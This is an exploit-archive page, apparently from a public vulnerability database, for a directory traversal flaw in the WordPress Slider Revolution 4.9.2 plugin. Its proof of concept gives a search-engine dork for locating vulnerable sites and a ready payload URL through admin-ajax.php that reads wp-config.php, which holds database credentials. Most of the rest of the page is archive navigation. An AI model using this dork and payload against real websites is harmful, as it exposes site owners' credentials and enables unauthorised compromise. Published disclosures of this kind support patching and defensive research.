WordPress Slider Revolution 4.9.2 Directory Traversal

WordPress Slider Revolution 4.9.2 Directory Traversal

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474

Download | Favorite | View

WordPress Slider Revolution 4.9.2 Directory Traversal

====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

File Tags

• ActiveX (932)
• Advisory (79,868)
• Arbitrary (15,737)
• BBS (2,859)
• Bypass (1,624)
• CGI (1,018)
• Code Execution (6,953)
• Conference (674)
• Cracker (840)
• CSRF (3,294)
• DoS (22,648)
• Encryption (2,353)
• Exploit (50,449)
• File Inclusion (4,171)
• File Upload (948)
• Firewall (821)
• Info Disclosure (2,667)
• Intrusion Detection (868)
• Java (2,913)
• JavaScript (823)
• Kernel (6,323)
• Local (14,215)
• Magazine (586)
• Overflow (12,440)
• Perl (1,418)
• PHP (5,097)
• Proof of Concept (2,293)
• Protocol (3,439)
• Python (1,468)
• Remote (30,093)
• Root (3,506)
• Rootkit (501)
• Ruby (595)
• Scanner (1,633)
• Security Tool (7,795)
• Shell (3,111)
• Shellcode (1,206)
• Sniffer (888)
• Spoof (2,172)
• SQL Injection (16,119)
• TCP (2,382)
• Trojan (686)
• UDP (878)
• Virus (662)
• Vulnerability (31,182)
• Web (9,382)
• Whitepaper (3,732)
• x86 (946)
• XSS (17,506)
• Other

File Archives

• January 2023
• December 2022
• November 2022
• October 2022
• September 2022
• August 2022
• July 2022
• June 2022
• May 2022
• April 2022
• March 2022
• February 2022
• Older

Systems

• AIX (426)
• Apple (1,936)
• BSD (370)
• CentOS (55)
• Cisco (1,917)
• Debian (6,649)
• Fedora (1,690)
• FreeBSD (1,242)
• Gentoo (4,288)
• HPUX (878)
• iOS (334)
• iPhone (108)
• IRIX (220)
• Juniper (67)
• Linux (44,427)
• Mac OS X (684)
• Mandriva (3,105)
• NetBSD (255)
• OpenBSD (479)
• RedHat (12,511)
• Slackware (941)
• Solaris (1,607)
• SUSE (1,444)
• Ubuntu (8,231)
• UNIX (9,177)
• UnixWare (185)
• Windows (6,512)
• Other